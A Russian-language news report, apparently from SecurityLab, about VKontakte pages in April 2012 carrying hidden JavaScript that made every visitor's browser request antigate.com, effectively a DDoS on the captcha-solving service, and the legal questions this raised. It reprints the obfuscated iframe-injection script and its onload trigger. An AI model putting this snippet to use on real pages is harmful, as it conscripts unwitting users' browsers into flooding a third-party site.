27.04.2012 многие пользователи ВКонтакте, посетившие сайт социальной сети, могли стать невольными участниками DDoS атаки на сайт antigate.com.
Крупнейшая социальная сеть в СНГ «ВКонтакте» на протяжении нескольких часов использовала миллионы своих активных пользователей без их согласия для DDoS-атаки на сайт «Antigate.com».
Посмотрев исходный код любой страницы «ВКонтакте», можно было заметить там интересные строки Java-скрипта, который производил обращения к стороннему сайту в отдельно создаваемом Iframe_блоке, передавая при этом параметр «in.php?first_and_last_warning=on», что дословно означает — «Первое и последнее предупреждение». Таким образом, социальная сеть направила неимоверную волну трафика на ресурс «Antigate.com».
Не многие знают, что этот сервис позволяет распознавать капчу (captcha) — изображение с искаженным текстом, используемое, в основном, в целях борьбы с ботами и для предотвращения возможности массового подбора пароля к чему-либо. «Antigate» — это наиболее известный инструмент в спаммерских кругах. Его используют для рассылки сообщений в наиболее известных социальных сервисах, среди которых особой популярностью пользуется «ВКонтакте».
Стоит отметить, что подобные действия со стороны «ВКонтакте» незаконны и попадают сразу под несколько статей УК РФ — 273 и 274. Социальная сеть использовала пользователей без их собственного ведома в преступных целях, вовлекая при этом и малолетних детей.
Администрация сети пока никак не прокомментировала данную ситуацию, напрямую связанную с уголовной ответственностью. Но эксперты в области компьютерной безопасности пока рекомендуют всем пользователям воздержаться от посещения соцсети до разрешения сложившихся обстоятельств.
На страницах пользователей загружался следующий javascript сценарий:
function _test() {
var fr=utilsNode.appendChild(ce('iframe')),d=fr.contentWindow.document;d.open();
d.write(' <script>this.location="http://ant'+'iga'+'te.com/i '+'n.php?'+'firs'+'t_an'+'d_la'+'st_wa'+'rnin'+ 'g=o'+'n";</sc'+'ript>');
setTimeout(re.pbind(fr),1000);
}
<body onresize="onBodyResize()" class="is_rtl font_default" onload="_test()">
Этот сценарий отправлял запрос на сайт antigate.com из браузера каждого пользователя соцсети «ВКонтакте» при каждой загрузке страницы.
Подобные действия со стороны администрации «ВКонтакте» не могут радовать, и невольно поднимается вопрос о моральности и законности (ст. 274 УК РФ) подобных действий.
Редакция SecurityLab отправила письмо в пресс-службу «ВКонтаке» с просьбой прокомментировать сложившуюся ситуацию, но на момент публикации новости ответ получен не был.
Теги: Бесплатный вебинар, управление персоналом, бухгалтерский учет, главный бухгалтер
